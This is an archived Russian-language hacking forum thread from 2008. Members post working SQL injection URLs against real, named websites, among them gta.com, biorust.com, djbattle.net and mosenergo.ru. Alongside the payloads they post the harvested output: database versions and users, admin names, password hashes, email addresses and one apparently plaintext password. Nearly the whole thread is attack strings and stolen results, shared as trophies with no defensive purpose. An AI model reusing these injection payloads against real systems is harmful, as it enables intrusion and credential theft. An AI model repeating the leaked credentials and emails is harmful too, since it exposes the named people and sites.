ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.02.2008, 14:36
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
GTA.com
Код HTML:
ttp://www.gta.com/support/showReleaseNote/?id=-15+union+select+concat(USER(),0x3a,VERSION(),0x3a,DATABASE())/*
root@localhost:4.0.12-log:gta
Код HTML:
http://www.gta.com/support/showReleaseNote/?id=-15+union+select+concat(user,0x3a,password)+from+mysql.user/*
Код HTML:
http://www.gta.com/support/showReleaseNote/?id=-15+union+select+concat(user,0x3a,password)+from+mysql.user+limit+2,10/*
jmontilla:12107ef60046dd4c
|
|
|
12.02.2008, 14:44
|
|
Участник форума
Регистрация: 31.10.2007
Сообщений: 193
Провел на форуме:
2080216
Репутация:
150
|
|
Код:
http://www.mamochka.org/modules.php?name=Top&querylang=union+select+1,TABLE_NAME,3,4+from+INFORMATION_SCHEMA.TABLES/*
|
|
|
|
12.02.2008, 14:58
|
|
Участник форума
Регистрация: 02.06.2007
Сообщений: 210
Провел на форуме:
1172175
Репутация:
252
|
|
Код:
http://simplymichigan.com/blog/index.php?cat_id=99999+union+select+1,2,3,4,concat_ws(0x3a,user_name,password),6,7,8,9,10,11,12+from+users/*
michi18_michigan@localhost:michi18_michigan:4.1.22-standard
Код:
http://www.absolutemusic.co.uk/shop/index.php?cat_id=99999+union+select+1,2,3,4,5,6,7,8,9,10/*
absolute@localhost:absolute_:4.1.21-standard-log |
|
|
|
12.02.2008, 16:17
|
|
Участник форума
Регистрация: 14.07.2007
Сообщений: 108
Провел на форуме:
1888785
Репутация:
305
|
|
ШОП discountcycleshop.co.uk
http://discountcycleshop.co.uk/product_details.php?product_id=999+UNION+SELECT+1, 2,3,4,5,6,7,concat_ws(0x3a,user(),version(),databa se()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34/*
ddbuser1@localhost:4.1.22:discountdb |
|
|
|
12.02.2008, 16:24
|
|
Участник форума
Регистрация: 02.06.2007
Сообщений: 210
Провел на форуме:
1172175
Репутация:
252
|
|
Код:
http://gp.by/index.php?mode=cat&cat_id=99999+union+select+1,2,3,4,5,6,7+from+admin/*
|
|
|
|
12.02.2008, 17:19
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.photosale.ru/index.php?page=-1+union+select+concat_ws(0x2F,version(),database() ,user())/*
5.0.45-log/u41000/u41000@10.10.223.73
-----------------------------------------------------------------------------
biorust.com
http://www.biorust.com/index.php?page=tutorial_detail&tutid=-1'+union+select+1,concat_ws(0x2F,version(),databas e(),user()),3,4,5,6,7,8,9,10,11,12/*
5.0.22/biorust_com/biorust@localhost
http://www.biorust.com/index.php?page=tutorial_detail&tutid=-1'+union+select+1,concat_ws(0x2F,admin_name,admin_ password),3,4,5,6,7,8,9,10,11,12+from+biorust_com. linkbase_admins+limit+0,1/*
имя/хеш
Scrowler/4c2e348299295d7b87fa02fd14d89c7b
http://www.biorust.com/index.php?page=tutorial_detail&tutid=-1'+union+select+1,2,3,4,concat_ws(0x2F,username,pa ssword,email,icq),6,7,8,9,10,11,12+from+biorust_fo rums.user+limit+41000,1/*
логин/хеш/мейл/уин
premutos/35a8e932251deca43174675add295437/n.turovsky@gmx.de/
|
|
|
|
12.02.2008, 17:30
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
http://www.obereg.ru/spec.html?id=-1+union+select+1,2,3,4/*
[ obereg@localhost ]
[ 4.1.11-standard ]
[ db_obereg ]
==========================
http://www.visit-palawan.com/picture_gallery.php?categories=60&select_cate=-1+union+select+1,2,3/*
5.0.45-community-log
visitchi_root@loclhost
visitchi_palawan
Последний раз редактировалось xcedz; 14.02.2008 в 17:08..
|
|
|
|
12.02.2008, 20:55
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://grate.ru/index.php?cat_id=13'+union+select+0,1,2,3,4,5,conc at(version(),0x3a,user(),0x3a,database()),7,8,9,10 ,11,12,13,14,15/*
Нет доступа к шемке:РР
http://topofgames.com/index.php?cat_id=72'
Подставил какое-то значение не помню,вывело ашиппку.Стоит фильтрация на кавычку.Вместо неё куча обратных слешей:РР
http://www.dotfiles.com/index.php?cat_id=-6+order+by+1/*
Дыра есь,но как обойти хз:РР
http://www.nlstar.com/catalog/index.php?cat_id=17'+union+select+1,2,3/*
Дальше не канает :Р
|
|
|
|
12.02.2008, 22:14
|
|
Познающий
Регистрация: 06.11.2007
Сообщений: 57
Провел на форуме:
2688963
Репутация:
272
|
|
mega.km.ru
Код:
http://mega.km.ru/ojigov/encyclop.asp?TopicNumber=1+or+1=@@version
@@version Microsoft SQL Server 2000 - 8.00.2039 (Intel IA-64) May 3 2005 23:34:52 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 1)
db_name() ojigov
system_user mega_link
через
Код:
http://mega.km.ru/ojigov/encyclop.asp?TopicNumber=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('dtproperties'))--
нашел таблицы:
dtproperties
Rubr
RubrLinksStat
Search
Stat
StatOrder
sysconstraints
syssegments
но интересных колонок в них не нашел=/
p.s. в mssql я очень плохо разбираюсь, это вобще моя первая mssql inj, так что не судите строго, делал всё согласно статье от [ cash ]
sosna1.ru
version() 5.0.45-log
user() u71952@10.10.223.224
database() u71952
Код:
http://sosna1.ru/info.php?infoid=19999+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11/*
ethanol.org
version() 4.1.15
user() ETHANOL@LOCALHOST
database() ETHANOLDB
djbattle.net
version() 4.1.12
user() djbattle@localhost
database() djbattle
Код:
http://www.djbattle.net/tv.php?tvID=99999+union+select+1,2,3,convert(concat(version(),0x3a,user(),0x3a,database()),binary),5,6,7,8,9,10,11/*
нашел таблицу users.
Код:
http://www.djbattle.net/tv.php?tvID=99999+union+select+111,2,333,convert(concat(min(id),0x3a,user,0x3a,pass,0x3a,mail),binary),5,6,7,8,9,10,11+from+users/*
id:user:рass:mail
3: tobbe: 1skills2:info@djbattle.net
он видимо админ
Последний раз редактировалось nex0; 12.02.2008 в 22:19..
|
|
|
|
13.02.2008, 00:17
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
2 Велемир
Не тормози =\
Код HTML:
http://www.dotfiles.com/index.php?cat_id=6+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database())/*
Код HTML:
http://www.nlstar.com/catalog/index.php?cat_id=17'+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database())/*
http://www.mosenergo.ru/
Код HTML:
http://www.mosenergo.ru/eng/index.php?id=226&news_id=-1055+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5+FROM+information_schema.tables/*&theme=56&sessid=4a
5.0.45-log:site@zvm5
Последний раз редактировалось ~EviL~; 13.02.2008 в 00:38..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
